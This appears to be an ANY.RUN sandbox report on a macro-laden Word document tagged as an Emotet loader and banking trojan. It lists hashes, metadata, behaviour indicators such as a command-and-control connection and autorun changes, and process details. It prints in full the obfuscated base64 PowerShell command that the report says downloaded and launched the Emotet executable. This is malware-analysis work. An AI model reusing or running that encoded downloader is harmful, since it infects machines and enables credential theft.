General Info

File name

0bs4-l1c5x-ypgzxqk

Full analysis
https://app.any.run/tasks/033f2319-063b-4c67-a86c-2443a608fd3b
Verdict
Malicious activity
Analysis date
3/14/2019, 18:19:22
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

generated-doc

loader

emotet

banker

trojan

feodo

Indicators:

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 14:23:00 2019, Last Saved Time/Date: Thu Mar 14 14:23:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5

f3f0c3ab525f0e91098b4cbe6908f31a

SHA1

41b93e49aaf303fb455e7198a65ebcf3fa65c4f4

SHA256

3eb82a4222e85a3bf961d094c19520e14f28142b9b58cc0ad165aaa219c788b8

SSDEEP

6144:o77HUUUUUUUUUUUUUUUUUUUT52Vz/8mReBU7sFD0ZKL+eft20L:o77HUUUUUUUUUUUUUUUUUUUTCDReBU7+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Connects to CnC server
  • wabmetagen.exe (PID: 2260)
EMOTET was detected
  • wabmetagen.exe (PID: 2260)
Application was dropped or rewritten from another process
  • wabmetagen.exe (PID: 3564)
  • 272.exe (PID: 3984)
  • wabmetagen.exe (PID: 2260)
  • 272.exe (PID: 2728)
Downloads executable files from the Internet
  • powershell.exe (PID: 3412)
Emotet process was detected
  • wabmetagen.exe (PID: 3564)
Changes the autorun value in the registry
  • wabmetagen.exe (PID: 2260)
Starts Microsoft Office Application
  • WINWORD.EXE (PID: 3332)
  • chrome.exe (PID: 3684)
Application launched itself
  • WINWORD.EXE (PID: 3332)
  • wabmetagen.exe (PID: 3564)
  • 272.exe (PID: 2728)
Creates files in the user directory
  • powershell.exe (PID: 3412)
Executable content was dropped or overwritten
  • powershell.exe (PID: 3412)
  • 272.exe (PID: 3984)
Starts itself from another location
  • 272.exe (PID: 3984)
Reads settings of System Certificates
  • chrome.exe (PID: 3684)
Creates files in the user directory
  • iexplore.exe (PID: 1488)
  • iexplore.exe (PID: 3404)
  • WINWORD.EXE (PID: 3332)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3716)
  • WINWORD.EXE (PID: 2964)
  • WINWORD.EXE (PID: 3332)
Application launched itself
  • chrome.exe (PID: 3684)
  • iexplore.exe (PID: 3404)
Reads Internet Cache Settings
  • chrome.exe (PID: 3684)
  • iexplore.exe (PID: 1488)
Reads internet explorer settings
  • iexplore.exe (PID: 1488)
Changes internet zones settings
  • iexplore.exe (PID: 3404)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.doc
|   Microsoft Word document (54.2%)
.doc
|   Microsoft Word document (old ver.) (32.2%)
EXIF
FlashPix
Title:
null
Subject:
null
Author:
null
Keywords:
null
Comments:
null
Template:
Normal.dotm
LastModifiedBy:
null
RevisionNumber:
1
Software:
Microsoft Office Word
TotalEditTime:
null
CreateDate:
2019:03:14 14:23:00
ModifyDate:
2019:03:14 14:23:00
Pages:
1
Words:
2
Characters:
13
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
Lines:
1
Paragraphs:
1
CharCountWithSpaces:
14
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
null
HeadingPairs
null
null
CompObjUserTypeLen:
32
CompObjUserType:
Microsoft Word 97-2003 Document

Screenshots

Processes

Total processes
56
Monitored processes
21
Malicious processes
5
Suspicious processes
0

Behavior graph

+
start download and start drop and start winword.exe no specs powershell.exe 272.exe no specs 272.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe iexplore.exe iexplore.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs chrome.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3332
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0bs4-l1c5x-ypgzxqk.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\actxprxy.dll
c:\progra~1\common~1\micros~1\office14\ophproxy.dll

PID
3412
CMD
powershell -e KAAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIABJAG8ALgBjAG8AbQBwAHIARQBTAFMASQBvAE4ALgBEAEUARgBMAEEAVABlAHMAdABSAGUAQQBNACgAIABbAEkATwAuAG0ARQBtAG8AUgB5AHMAVAByAGUAQQBNAF0AIABbAHMAWQBzAHQAZQBNAC4AYwBvAG4AVgBFAFIAVABdADoAOgBGAHIAbwBtAEIAQQBzAGUANgA0AFMAdABSAEkAbgBHACgAIAAoACcAWABaAEoAJwArACcAUgBhADkAcwB3ACcAKwAnAEYASQBYACcAKwAnAC8AJwArACcAaQBoADQATQBTAHMAaABpAE4AOAAnACsAJwBWAGoAVQAnACsAJwBHAFAAJwArACcAbwBqAGIAJwArACcAVQBaACcAKwAnAHQANgB6ACcAKwAnAEQAcgBHACcAKwAnAGEAYgBHAFEAJwArACcAUgAnACsAJwBiACcAKwAnAHYAYgBGACcAKwAnAFYAJwArACcAMgA1ACcAKwAnAEsAUgBsAGQAaAB0ACcAKwAnAHkASAArAGYAMQBpACcAKwAnAFcAaABUAEkAKwBYAGoAMwBQAE8AUABWAGYAJwArACcATwBMAHoAOQBqAEUANABTAFUAcAB5AHcASABSACcAKwAnAGcATwBIAEEAWQBNADEAaABCAEwASABwAFMAJwArACcAcQBmAGsAUgB2AHkAZwBNACcAKwAnAGIAJwArACcAOQBnACcAKwAnAFcAWAAnACsAJwBVAEMAcABRAG0AYwBEADQAcgBBAEcAQgBwACcAKwAnAFMARwB0AGoAJwArACcAKwBoACcAKwAnAHYAUABNAHoAJwArACcAcwB0AGgAYQB5AEcAJwArACcASABwAEgAWABMAGwAJwArACcAZQBkAHAAegB2AGYAMQB4ADkAJwArACcAZgB2ACcAKwAnAGQAMQBRAGUAYgBjAG4ANgAnACsAJwByACcAKwAnAFgAUQBSACcAKwAnAFMAawBLAEsAYgBCAEMAcABTACcAKwAnAHQAMAAnACsAJwBlAFYAbQA0AGYAZQB1AEoAcgBxAGgAJwArACcAdwA4AE8ANABlAEwAJwArACcAdQBSACcAKwAnAGcAOQAnACsAJwBLADYAJwArACcAcQAnACsAJwBXAGkAJwArACcAdgBKAE4AUgBaACcAKwAnAEcANwBQAEYATgBkAE8AeQAnACsAJwBYAFgARQAnACsAJwBsAGoASQAnACsAJwAzAGgAZgAnACsAJwByACsANwAvACcAKwAnADAAJwArACcAWQBQACcAKwAnAEYAOQAyAGkAZAAnACsAJwB0ACcAKwAnAFMAJwArACcAaAAnACsAJwBjACcAKwAnADgAZgBTAGUAZQBmAHgAMgBFAGQAUgAnACsAJwBxACcAKwAnAEcAJwArACcAQQBxAGgAOABlAFYATgA1ADIAJwArACcAUgAnACsAJwBZAGIAegAnACsAJwAzAHEAJwArACcAZgB1ADkAYgBZACcAKwAnAFcAYgAnACsAJwAwAGwAcwA0ACcAKwAnAEQAQgAyAEQAVAByAEoAbwA4AHAAQgAnACsAJwBIADcAdQAxADkAdQBxACsAZwAyAGsAJwArACcASABNACcAKwAnAEEARQAnACsAJwBoAEoAJwArACcANgAvAGUAbgBhAEQAcAAnACsAJwBJADAANQBSAEMAJwArACcASAB0AEoAdwBnACcAKwAnAFoAdAAnACsAJwBEAFkAeQBSADEATQBMAEYAcgBEAEsAbgAnACsAJwBSAFEANwBtADkAMgBBACsAcAAnACsAJwBlAHEANgAxAG8AYwAnACsAJwBVAEYALwAwADgAVgAnACsAJwBaAFkAVQAnACsAJwBGAGQAJwArACcAbgBKAEEARwBXADIAVQAzACcAKwAnADQAdgBYAE0AUwBWACcAKwAnAGYAYwBsAGsAeQBFAEoATwBjACcAKwAnADYANQB3AGUAJwArACcAagBYACcAKwAnAHcAJwArACcANgBuACcAKwAnADkAbAAyACcAKwAnAG0AJwArACcAUgAnACsAJwB0AG0AcQA0AHUAbQBMAFYAVAAnACsAJwByACcAKwAnAFQASAA4AGoARgB6ACcAKwAnAGMAJwArACcAWgBOAGYAcQA2ACcAKwAnAGgAaQBUAE0AZQAwAHYAcwB4ADgAOABjAEkAVQBoACcAKwAnAG8AawBXAHoAJwArACcASwBiAHgAJwArACcAVwBpAFcAaQBjACcAKwAnAEgAdQBIAGUAMgAyAEsAQwB0AFQAawAyAFcARgAnACsAJwB4AEwAKwB5AGIAMAA0AE8AaQBkAHkAcgBCAHYAJwArACcAOAAnACsAJwBqADcAZgBYAGoAVABaAFoARwAnACsAJwBJAFgAMwAnACsAJwBrAFUAMgBaADcAcwBCACsAaQAnACsAJwB0ACcAKwAnAEoARwBiADQASABqAGsAaAAnACsAJwBlACcAKwAnAEgAMQA0AFgAJwArACcAaAAwACcAKwAnAEkAcwBZAG0AJwArACcAUAAnACsAJwA4ACcAKwAnADUAJwArACcAWQBTAEoAOABCAHMAagB5AHoAeABuACcAKwAnADgAJwArACcAQQAnACkAIAApACAALAAgAFsAUwB5AFMAdABFAG0ALgBJAG8ALgBjAG8AbQBQAHIAZQBzAHMAaQBPAE4ALgBDAG8ATQBQAFIAZQBTAHMAaQBvAE4ATQBvAEQARQBdADoAOgBEAEUAQwBPAG0AUAByAEUAcwBTACkAfAAgACUAewAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIAAgAGkATwAuAHMAdABSAGUAQQBtAFIARQBBAEQARQBSACgAJABfACAALAAgAFsAVABlAFgAdAAuAEUAbgBDAG8ARABpAG4AZwBdADoAOgBBAFMAYwBJAEkAIAApAH0AfAAgACUAIAB7ACAAJABfAC4AUgBFAGEARABUAE8AZQBuAEQAKAAgACkAfQAgACkAfAAgAGkATgBWAE8AawBFAC0ARQBYAHAAUgBFAFMAUwBpAG8AbgA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\272.exe
c:\windows\system32\netutils.dll

PID
2728
CMD
"C:\Users\admin\272.exe"
Path
C:\Users\admin\272.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® HTML Help Executable
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\272.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3984
CMD
"C:\Users\admin\272.exe"
Path
C:\Users\admin\272.exe
Indicators
Parent process
272.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® HTML Help Executable
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\272.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\mssprxy.dll

PID
3564
CMD
"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path
C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Indicators
Parent process
272.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® HTML Help Executable
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2260
CMD
"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path
C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Indicators
Parent process
wabmetagen.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft® HTML Help Executable
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll

PID
3404
CMD
